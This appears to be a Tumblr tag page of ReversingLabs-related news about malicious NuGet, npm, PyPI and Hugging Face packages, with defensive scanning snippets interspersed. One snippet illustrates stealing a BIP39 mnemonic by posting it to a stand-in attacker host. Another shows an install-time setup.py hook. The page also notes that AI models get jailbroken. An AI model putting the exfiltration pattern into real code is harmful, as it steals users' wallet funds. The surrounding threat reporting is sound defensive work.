#ReversingLabs
Explore tagged Tumblr posts
IAmReboot: Malicious NuGet packages exploit loophole in MSBuild integrations
ReversingLabs has identified connections between a malicious campaign recently discovered and reported by the firm Phylum and several hundred malicious packages published to the NuGet package manager since the beginning of August. The latest discoveries are evidence of what appears to be an ongoing, coordinated campaign. Furthermore, ReversingLabs research shows how malicious actors are…
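The loophole here is that although NuGet deprecated install scripts, packages can still ship MSBuild hook files (build/*.props and build/*.targets) that consuming projects import and execute at build time. Below is a minimal triage sketch for a .nupkg on disk; the marker list is illustrative, and this is not ReversingLabs' detection logic.

```python
# Heuristic scan of a .nupkg (a zip archive) for MSBuild build hooks.
# A minimal sketch, not ReversingLabs' method; markers are illustrative.
import sys
import zipfile

# MSBuild constructs that execute code or fetch content at build time.
SUSPICIOUS_MARKERS = (b"<Exec", b"CodeTaskFactory", b"<DownloadFile")

def scan_nupkg(path: str) -> None:
    with zipfile.ZipFile(path) as pkg:
        for name in pkg.namelist():
            lower = name.lower()
            # NuGet auto-imports build/*.props|*.targets (and
            # buildTransitive/...) into consuming projects.
            if lower.startswith(("build/", "buildtransitive/")) and lower.endswith((".props", ".targets")):
                data = pkg.read(name)
                hits = [m.decode() for m in SUSPICIOUS_MARKERS if m in data]
                if hits:
                    print(f"{path}: {name} contains {hits}")

if __name__ == "__main__":
    for nupkg in sys.argv[1:]:
        scan_nupkg(nupkg)
```

Any hit only flags a package for manual review; plenty of legitimate packages ship build hooks.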

GitHub hit by a sophisticated malware campaign as ‘Banana Squad’ mimics popular repos
A threat group dubbed “Banana Squad,” active since April 2023, has trojanized more than 60 GitHub repositories in an ongoing campaign, offering Python-based hacking kits with malicious payloads. Discovered by ReversingLabs, the malicious public repos each imitate a well-known hacking tool to look legitimate but inject hidden backdoor logic.
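One obfuscation trick reported in trojanized-repo campaigns like this is pushing the payload far off-screen behind long runs of whitespace so it escapes casual review. A minimal repo-linter sketch, with illustrative thresholds:

```python
# Flag Python lines that hide code behind long whitespace runs or are
# suspiciously long. Thresholds are illustrative, not tuned.
import pathlib
import re

LONG_GAP = re.compile(r"\S[ \t]{200,}\S")  # code, a huge gap, more code

def audit_repo(root: str) -> None:
    for py in pathlib.Path(root).rglob("*.py"):
        text = py.read_text(errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            if len(line) > 500 or LONG_GAP.search(line):
                print(f"{py}:{lineno}: padded/overlong line ({len(line)} chars)")

audit_repo(".")
```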
Malicious npm package secretly targets Atomic, Exodus wallets to intercept and reroute funds
Researchers have discovered a malicious software package uploaded to npm that secretly alters locally installed versions of crypto wallets and allows attackers to intercept and reroute digital currency transactions, ReversingLabs revealed in a recent report. The campaign injected trojanized code into locally installed Atomic and Exodus wallet software and hijacked crypto transfers. The attack…
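Because the campaign tampers with wallet files already installed on disk, one defensive angle is verifying those files against known-good hashes. A minimal sketch; the file list and digest are placeholders, not real Atomic or Exodus values:

```python
# Integrity check for locally installed wallet files -- a minimal sketch.
# KNOWN_GOOD would be pinned from a trusted vendor release, not invented.
import hashlib
import pathlib

KNOWN_GOOD = {
    # "resources/app.asar": "<sha256 of the vendor-shipped bundle>",
}

def sha256(path: pathlib.Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def verify(install_dir: str) -> None:
    root = pathlib.Path(install_dir)
    for rel, expected in KNOWN_GOOD.items():
        target = root / rel
        if not target.exists():
            print(f"{rel}: missing")
            continue
        status = "OK" if sha256(target) == expected else "MODIFIED -- investigate"
        print(f"{rel}: {status}")
```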
Attackers are finding more and more ways to post malicious projects to Hugging Face and other repositories for open source artificial intelligence (AI) models, while dodging the sites' security checks. The escalating problem underscores the need for companies pursuing internal AI projects to have robust mechanisms to detect security flaws and malicious code within their supply chains.

Hugging Face's automated checks, for example, recently failed to detect malicious code in two AI models hosted on the repository, according to a Feb. 3 analysis published by software supply chain security firm ReversingLabs. The threat actor used a common vector — data files using the Pickle format — with a new technique, dubbed "NullifAI," to evade detection.

While the attacks appeared to be proofs-of-concept, their success in being hosted with a "No issue" tag shows that companies should not rely on Hugging Face's and other repositories' safety checks for their own security, says Tomislav Pericin, chief software architect at ReversingLabs.

"You have this public repository where any developer or machine learning expert can host their own stuff, and obviously malicious actors abuse that," he says. "Depending on the ecosystem, the vector is going to be slightly different, but the idea is the same: Someone's going to host a malicious version of a thing and hope for you to inadvertently install it."

Companies are quickly adopting AI, and the majority are also establishing internal projects using open source AI models from repositories — such as Hugging Face, TensorFlow Hub, and PyTorch Hub. Overall, 61% of companies are using models from the open source ecosystem to create their own AI tools, according to a Morning Consult survey of 2,400 IT decision-makers sponsored by IBM.

Yet many of the components can contain executable code, leading to a variety of security risks, such as code execution, backdoors, prompt injections, and alignment issues — the latter being how well an AI model matches the intent of its developers and users.

In an Insecure Pickle

One significant issue is that a commonly used data format, known as a Pickle file, is not secure and can be used to execute arbitrary code. Despite vocal warnings from security researchers, the Pickle format continues to be used by many data scientists, says Tom Bonner, vice president of research at HiddenLayer, an AI-focused detection and response firm.

"I really hoped that we'd make enough noise about it that Pickle would've gone by now, but it's not," he says. "I've seen organizations compromised through machine learning models — multiple [organizations] at this point. So yeah, whilst it's not an everyday occurrence such as ransomware or phishing campaigns, it does happen."

While Hugging Face has explicit checks for Pickle files, the malicious code discovered by ReversingLabs sidestepped those checks by using a different file compression for the data. Other research by application security firm Checkmarx found multiple ways to bypass scanners such as PickleScan, used by Hugging Face to detect dangerous Pickle files.

[Image: Despite having malicious features, this model passes security checks on Hugging Face. Source: ReversingLabs]

"PickleScan uses a blocklist which was successfully bypassed using both built-in Python dependencies," Dor Tumarkin, director of application security research at Checkmarx, stated in the analysis.
"It is plainly vulnerable, but by using third-party dependencies such as Pandas to bypass it, even if it were to consider all cases baked into Python, it would still be vulnerable with very popular imports in its scope."Rather than Pickle files, data science and AI teams should move to Safetensors — a library for a new data format managed by Hugging Face, EleutherAI, and Stability AI — which has been audited for security. The Safetensors format is considered much safer than the Pickle format.Related:Warning: Tunnel of Love Leads to ScamsDeep-Seated AI VulnerabilitiesExecutable data files are not the only threats, however. Licensing is another issue: While pretrained AI models are frequently called "open source AI," they generally do not provide all the information needed to reproduce the AI model, such as code and training data. Instead, they provide the weights generated by the training and are covered by licenses that are not always open source compatible.Creating commercial products or services from such models can potentially result in violating the licenses, says Andrew Stiefel, a senior product manager at Endor Labs."There's a lot of complexity in the licenses for models," he says. "You have the actual model binary itself, the weights, the training data, all of those could have different licenses, and you need to understand what that means for your business."Model alignment — how well its output aligns with the developers' and users' values — is the final wildcard. DeepSeek, for example, allows users to create malware and viruses, researchers found. Other models — such as OpenAI's o3-mini model, which boasts more stringent alignment — has already been jail broken by researchers.These problems are unique to AI systems and the boundaries of how to test for such weaknesses remains a fertile field for researchers, says ReversingLabs' Pericin."There is already research about what kind of prompts would trigger the model to behave in an unpredictable way, divulge confidential information, or teach things that could be harmful," he says. "That's a whole other discipline of machine learning model safety that people are, in all honesty, mostly worried about today."Companies should make sure to understand any licenses covering the AI models they are using. In addition, they should pay attention to common signals of software safety, including the source of the model, development activity around the model, its popularity, and the operational and security risks, Endor's Stiefel says."You kind of need to manage AI models like you would any other open source dependencies," Stiefel says. "They're built by people outside of your organization and you're bringing them in, and so that means you need to take that same holistic approach to looking at risks." [ad_2] Source link
Warning for Developers: Lazarus Group Spreads Malware via Fake Coding Tests
Security researchers have uncovered a new set of malicious Python packages that are disguised as coding assignments and aimed at software developers. “The new examples have been linked to GitHub projects associated with previous, targeted attacks, in which developers are being lured in with fake job offers,” said Karlo Zanki, a researcher at ReversingLabs. The activities are believed to be part…
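Packages in such campaigns typically execute as soon as the candidate installs the "assignment." A minimal sketch of the install-time vector that setup.py-based packages abuse; the hook below only prints, and the package name is invented:

```python
# setup.py -- minimal sketch of the install-time execution vector.
# Hostile packages run droppers in hooks like this; ours just prints.
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        super().run()
        # Arbitrary code executes during `pip install` of an sdist.
        print("install-time hook ran")

setup(name="coding-assignment", version="0.1", cmdclass={"install": PostInstall})
```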
Watch Out: These PyPI Python Packages Can Drain Your Crypto Wallets
The Hacker News: Threat hunters have discovered a set of seven packages on the Python Package Index (PyPI) repository that are designed to steal BIP39 mnemonic phrases used for recovering private keys of a cryptocurrency wallet. The software supply chain attack campaign has been codenamed BIPClip by ReversingLabs. The packages were collectively downloaded 7,451 times prior to being removed from PyPI. http://dlvr.it/T3yYGS
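For illustration only, a sketch of the theft pattern described: a mnemonic "helper" that quietly copies the phrase to a remote endpoint. All names and the URL are hypothetical and not taken from the BIPClip packages, and the word list is a three-word stand-in for the real 2048-word BIP39 list:

```python
# Illustrative sketch of mnemonic exfiltration; nothing here is real code
# from the campaign. Endpoint and names are hypothetical.
import json
import secrets
import urllib.request

WORDS = ["abandon", "ability", "able"]  # stand-in for the BIP39 word list

def generate_mnemonic(n: int = 12) -> str:
    phrase = " ".join(secrets.choice(WORDS) for _ in range(n))
    try:
        # The malicious twist: exfiltrate the recovery phrase.
        req = urllib.request.Request(
            "https://attacker.example/collect",  # hypothetical endpoint
            data=json.dumps({"m": phrase}).encode(),
            headers={"Content-Type": "application/json"},
        )
        urllib.request.urlopen(req, timeout=3)
    except OSError:
        pass  # fail silently so the caller notices nothing
    return phrase
```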
ReversingLabs Applies AI to Better Secure Application Binaries
http://securitytc.com/T2qyYN
Regional Sales Manager - Northwest at ReversingLabs
Description: At ReversingLabs, our application security and threat intelligence solutions have become essential to advancing cybersecurity around the globe. We're now on a journey to expand adoption and accelerate growth, funded by our recent Series B investment, to hire top talent across the security industry. This is a game-changing opportunity. We know every application threatens businesses with…

Malicious PyPI Module Poses as SentinelOne SDK
Home › Virus & Threats Malicious PyPI Module Poses as SentinelOne SDK By Ionut Arghire on December 19, 2022 Tweet Security researchers with ReversingLabs warn of a new supply chain attack using a malicious PyPI module that poses as a software development kit (SDK) from the cybersecurity firm SentinelOne. The Python package was first uploaded on December 11 and received roughly 20 updates within…
ReversingLabs adds new context-based secret detection capabilities
http://dlvr.it/SkspBk t.ly/m_Jb
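The announcement is light on detail, but "context-based" secret detection generally means pairing a credential-shaped pattern with checks on the surrounding text to suppress false positives. A minimal sketch under that assumption, not ReversingLabs' implementation:

```python
# Context-aware secret scan: match a token shape, then inspect nearby
# text to skip docs and test fixtures. Patterns are illustrative.
import re

TOKEN = re.compile(r"AKIA[0-9A-Z]{16}")  # AWS access key ID shape
BENIGN_CONTEXT = re.compile(r"example|sample|test|dummy|placeholder", re.I)

def find_secrets(text: str):
    for m in TOKEN.finditer(text):
        window = text[max(0, m.start() - 80): m.end() + 80]
        if BENIGN_CONTEXT.search(window):
            continue  # likely documentation, not a live credential
        yield m.group()

print(list(find_secrets('aws_key = "AKIAABCDEFGHIJKLMNOP"')))
```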
Dozens of Malicious 'HTTP' Libraries Found on PyPI
ReversingLabs researchers have discovered a large number of malicious libraries in the Python Package Index (PyPI) repository. According to an advisory published Wednesday by Lucija Valentic, a software threat researcher at ReversingLabs, most of the files discovered were malicious packages posing as HTTP libraries. "The descriptions of these packages,…
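Packages posing as HTTP libraries usually trade on near-miss names. A minimal typosquat check, a sketch rather than ReversingLabs' detection logic, with an illustrative threshold:

```python
# Compare a candidate name's similarity to popular HTTP libraries.
from difflib import SequenceMatcher

POPULAR = ["requests", "urllib3", "aiohttp", "httpx"]

def closest_popular(name: str) -> None:
    best = max(POPULAR, key=lambda p: SequenceMatcher(None, name, p).ratio())
    score = SequenceMatcher(None, name, best).ratio()
    if 0.8 <= score < 1.0:  # near-miss of a well-known name
        print(f"'{name}' looks like a typosquat of '{best}' ({score:.2f})")

closest_popular("reqeusts")  # prints a typosquat warning
```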
Malicious Python Trojan Impersonates SentinelOne Security Client
In the latest supply chain attack, an unknown threat actor has created a malicious Python package that appears to be a software development kit (SDK) for a well-known security client from SentinelOne. According to an advisory from cybersecurity firm ReversingLabs issued on Monday, the package, dubbed SentinelSneak, appears to be a “fully functional SentinelOne client” and is currently under…

Malicious NPM packages used to grab data from apps, websites
Researchers from ReversingLabs discovered a couple of dozen NPM packages that included malicious code designed to steal data from apps and web forms on websites that embed the modules. The malicious NPM modules were delivered as part of a…
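Obfuscated JavaScript tends to look statistically different from hand-written code, so a crude entropy scan over node_modules can surface candidates for review. A rough sketch with illustrative thresholds; real triage needs more signals:

```python
# Flag high-entropy JavaScript files in node_modules as possible
# obfuscated payloads. Thresholds are illustrative.
import math
import pathlib
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    counts = Counter(data)
    total = len(data)
    return -sum(c / total * math.log2(c / total) for c in counts.values())

for js in pathlib.Path("node_modules").rglob("*.js"):
    data = js.read_bytes()
    if len(data) > 4096 and shannon_entropy(data) > 5.5:
        print(f"high-entropy file (possible obfuscation): {js}")
```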
Researchers Uncover Malicious NPM Packages Stealing Data from Apps and Web Forms
A widespread software supply chain attack has been targeting the NPM package manager since at least December 2021. The coordinated attack, dubbed IconBurst by ReversingLabs, involves no fewer than two dozen NPM packages containing obfuscated JavaScript laced with malicious code designed to harvest sensitive data from forms embedded in…

Developer Alert: NPM Packages for Node.js Hiding Dangerous TurkoRat Malware
The Hacker News: Two malicious packages discovered in the npm package repository have been found to conceal an open source information stealer malware called TurkoRat. The packages – named nodejs-encrypt-agent and nodejs-cookie-proxy-agent – were collectively downloaded approximately 1,200 times and were available for more than two months before they were identified and taken down. ReversingLabs, which broke… http://dlvr.it/SpHc1f
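Both packages were young and modestly downloaded, which is exactly the profile registry metadata can flag before you depend on a lookalike. A minimal sketch using npm's public registry and downloads APIs:

```python
# Pull an npm package's creation date and recent download count.
# A minimal vetting sketch; signals, not a verdict.
import json
import urllib.request

def npm_snapshot(package: str) -> None:
    meta = json.load(urllib.request.urlopen(
        f"https://registry.npmjs.org/{package}", timeout=10))
    downloads = json.load(urllib.request.urlopen(
        f"https://api.npmjs.org/downloads/point/last-month/{package}", timeout=10))
    print(f"{package}: created {meta['time']['created']}, "
          f"{downloads['downloads']} downloads last month")

npm_snapshot("express")  # substitute the dependency you are vetting
```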
Researchers Uncover Malicious NPM Packages Stealing Data from Apps and Web Forms
A widespread software supply chain attack has targeted the NPM package manager at least since December 2021 with rogue modules designed to steal data entered into forms by users on websites that include them. The coordinated attack, dubbed IconBurst by ReversingLabs, involves no fewer than two dozen NPM packages that include obfuscated JavaScript, which comes with malicious code to harvest sensitive data from forms… https://thehackernews.com/2022/07/researchers-uncover-malicious-npm.html